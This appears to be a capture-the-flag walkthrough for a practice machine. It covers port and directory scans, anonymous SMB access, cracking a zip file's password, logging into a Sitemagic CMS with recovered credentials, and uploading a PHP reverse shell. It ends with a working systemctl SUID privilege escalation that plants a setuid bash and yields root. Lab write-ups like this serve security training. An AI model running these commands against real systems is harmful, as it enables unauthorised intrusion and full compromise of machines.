I started by scanning the target machine for any open ports and services running on those ports using the Nmap tool.
nmap -p- -A <IP>
We have an Apache server running on port 80, let’s gobuster it :
gobuster dir --url http://<IP>/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js,php,txt,html,/ -t 100
Let’s try to see what we can find in the samba shares without password.
smbclient -L <IP>There is a Files folder, let’s log in to see what’s inside using this command :
smb //<IP>/Files
To download the file use this command : get website.zip. website.zip needs a password. Let’s try to crack it with frcrackzip and the rockyou.txt list.
fcrackzip website.zip -D -p /home/kali/Documents/rockyou.txt -u
README.txt gives us user : admin and password : jesse for the website kb.vuln. Let’s add kb.vuln to our hosts list with the following command :
sudo nano /etc/hosts
Go to http://kb.vuln/ it’s a Sitemagic CMS installation. Login as admin:jesse
Upload a php reverse shell :
And refresh the website to get a shell as www-data :
Use the following command to switch to a more complete shell :
/usr/bin/script -qc /bin/bash /dev/null = spwan shellcat user.txt in the home directory, first flag :
Now it’s time to privilege escalation, use the following command to search for SUID files :
find / -type f -perm /4000 -ls 2>/dev/nullThere is a very interesting one : /bin/systemctl. Systemctl is used to examine and control the state of “systemd” system and service manager. Use this site to find some exploit with systemctl. Try to understand how it works before running the exploit. We found an interesting one, let’s apply it :
On our www-data shell :
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash /var/www/html/sitemagic/ && chmod +s /var/www/html/sitemagic/bash"
[Install]
WantedBy=multi-user.target' > /var/www/html/sitemagic/shell.serviceLet’s link our shell.service with systemctl
systemctl link /var/www/html/sitemagic/shell.serviceenable --now /var/www/html/sitemagic/shell.servicecd /var/www/html/sitemagic/
And run it :
./bash -p
cd /root
…well done
